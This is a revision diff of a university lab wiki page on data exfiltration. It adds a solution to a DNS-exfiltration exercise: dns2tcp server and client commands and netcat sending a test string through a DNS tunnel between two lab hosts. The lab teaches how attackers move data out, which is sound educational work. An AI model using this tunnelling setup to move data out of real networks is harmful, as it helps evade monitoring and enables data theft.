Show page

Differences

This shows you the differences between two versions of the page.

--- cdci:labs:6 [2020/03/17 01:40]
mihai.chiroiu [07. [20p] DNS exfiltration]
+++ cdci:labs:6 [2020/05/15 17:07] (current)
mihai.chiroiu
@@ Line 1: / Line 1: @@
+~~SHOWSOLUTION~~
 ====== Lab06. Data exfiltration  ======
+<note warning>
+Important read to be graded!
+{{page>:cdci:rec&nofooter&noeditbutton&noheader}}
+</note>
 ===== Objectives =====
@@ Line 193: / Line 200: @@
 ==== 07. [20p] DNS exfiltration ====
-For this exercise we are going to create a DNS tunnel between the two nodes and use it for the Netcat connection. The tool for this is dns2tcp. Use the following configuration for the client/server side.
+For this exercise we are going to create a DNS tunnel between the two nodes and use it for the Netcat connection. The tool for this is [[http://www.linuxcertif.com/man/1/dns2tcpc/|dns2tcp]]. Use the following configuration for the client/server side.
   * Client side configuration
 <code>
@@ Line 219: / Line 226: @@
 <solution>
 <code>
+root@h2:/# dns2tcpd -f .dns2tcpdrc
+root@h2:/# netstat -nlup
+Active Internet connections (only servers)
+Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
+udp        0      0 0.0.0.0:53              0.0.0.0:*                           428/dns2tcpd
+root@h2:/# nc -l -p 8080 -k
+TEST
+root@h1:/# dns2tcpc -f .dns2tcprc 192.168.16.3 &
+[2] 196
+root@h1:/# Listening on port : 8080
+root@h1:/# netstat -nltp
+Active Internet connections (only servers)
+Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
+tcp        0      0 127.0.0.1:8080          0.0.0.0:*               LISTEN      196/dns2tcpc
+root@h1:/# nc 127.0.0.1 8080
+TEST
+^C
 </code>
 </solution>

General info CDCI

Lectures

Labs

Assignments

Resources

Useful resources

cdci/labs/6.1584402054.txt.gz · Last modified: 2020/03/17 01:40 by mihai.chiroiu

Show page Old revisions

Media Manager Back to top